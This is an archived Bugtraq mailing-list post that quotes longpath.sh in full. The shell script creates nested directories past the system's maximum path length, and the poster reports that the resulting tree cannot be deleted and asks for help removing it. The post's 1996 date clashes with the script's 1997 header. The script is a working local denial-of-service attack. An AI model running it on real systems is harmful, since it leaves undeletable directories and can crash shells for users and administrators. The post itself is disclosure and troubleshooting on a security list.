Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: in.telnetd bug (linux)

From: eszekely () UTTGM RO (Szekely-Benczedi Endre)
Date: Mon, 1 Jan 1996 16:37:01 +0200

        There is a nice small shell script at www.rootshell.com,
longpath.sh, wich exploits some bug in Linux about long pathnames...

Here's the program:

#  Problem:  Long pathnames are possible (> MAXPATHLEN) by creating directory
#  trees relatively, causing various problems on the system.
#
#  May 27, 1997
#
#  Systems:  Linux, probably some other unix's also.
#
#  rm -rf will fail to remove it, as rm -rf will try to remove it using absolut
#  pathnames which are long.  If the current directory is in the prompt, then
#  this overflows, typically crashing the shell.  Any programs that use absolut
#  pathnames will have problems.
#
#
#  Silvio Cesare
#
#
# The longpath attack implementation..
#
#!/bin/sh
#
#  Implementation of the longpath attack
#  Silvio Cesare, 1997

LENGTH=128
HEIGHT=32
ROOT=longpath
CHAR=A

set -- `getopt h:l:r:c: $*`
if test $? != 0
then
        echo usage: longpath [-h height] [-l length] [-r root] [-c char]
        exit 1
fi
for i
do
        case "$i"
        in
                -h)
                        HEIGHT=$2
                        shift; shift
                        ;;
                -l)
                        LENGTH=$2
                        shift; shift
                        ;;
                -r)
                        ROOT=$2
                        shift; shift
                        ;;
                -c)
                        CHAR=$2
                        shift; shift
                        ;;
                --)
                        shift
                        break
                        ;;
        esac
done

NAME=""

i=0
while test $i -lt $LENGTH
do
        NAME=$NAME$CHAR
        i=`expr $i + 1`
done

mkdir $ROOT
cd $ROOT
i=0
while test $i -lt $HEIGHT
do
        mkdir $NAME
        cd $NAME
        i=`expr $i + 1`
done

I heard that it is possible to erase it with mc (Midnight Commander).
Well, I can tell you' this ISN'T true ;-)
I tried the script on a RedHat Linux, and... well... I can't erase the
directory now ;-)
        I wonder if anyone of you knows the problem, and can help me with
that..
                                                10x
  ____________________________________________________________________
  |Szekely-Benczedi Endre     4339 Vargata nr.99, jud. Mures, ROMANIA|
  |E-mail: eszekely () felix uttgm ro WWW: http://www.uttgm.ro/~eszekely|
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Previous By Date Next
Previous By Thread Next

Current thread: